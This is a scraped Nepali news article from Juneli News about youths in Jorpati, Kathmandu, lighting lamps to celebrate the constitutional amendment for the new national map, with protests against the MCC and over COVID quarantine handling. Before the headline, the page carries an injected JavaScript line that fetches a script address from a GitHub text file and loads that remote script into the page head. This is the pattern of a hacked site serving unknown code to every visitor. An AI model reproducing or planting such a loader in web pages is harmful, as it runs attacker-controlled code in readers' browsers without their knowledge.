;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नयाँ नक्सा आएको खुसीमा जोरपाटी चोकमा दीप प्रज्वलन – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • नयाँ नक्सा आएको खुसीमा जोरपाटी चोकमा दीप प्रज्वलन
देश/प्रदेश

नयाँ नक्सा आएको खुसीमा जोरपाटी चोकमा दीप प्रज्वलन

३२ जेठ,

काठमाडौँ |  लिम्पियाधुरासहितका भूभाग समेटिएको नयाँ नक्साअनुसार निशान छाप परिर्वतन गर्न संविधान संशोधन भएको खुसीमा काठमाडौँ जोरपाटीका युवाहरुले दीप प्रज्ज्वलन गरेर खुसि मनाएका छन् |

साथै एमसीसी खारेज गर , करेनटाईनमा बसेकाहरुलाई राम्रो व्यबस्थापन गर, कोरोनाको चेक जाचमा सुधार गर, भन्दै बिरोध पनि गरेका थिए |

गोकर्नेश्वोर नगरपालिका भरिका संघ संस्थाहरु र  स्थानीय सुन्दरिजल, गोकर्ण, आरुबारी, सुन्दर टोल, अत्तरखेलका  युवाहरुको उपस्थितिमा सो कार्यक्रम गरिएको हो |

कार्यक्रममा गोकर्नेश्वोर नगरपालिकाका मेयर सन्तोष चालिसे, उप मेयर शान्ति नेपाल , प्रमुख सल्लाहकार दिपक रिसाल,  वडा अध्यक्षहरुको समेतको उपस्थिति रहेको थियो |

राष्ट्रिय झण्डासहित जम्मा भएका उनीहरुले जोरपाटी चोकमा नयाँ नक्सा बनाएर दीप प्रज्ज्वलन गरेका हुन् । संसदले शनिबार मात्र संविधान संशोधन प्रस्ताव सर्वसम्मत रुपमा पास गरेको थियो ।

फेसबुक प्रतिक्रियाहरु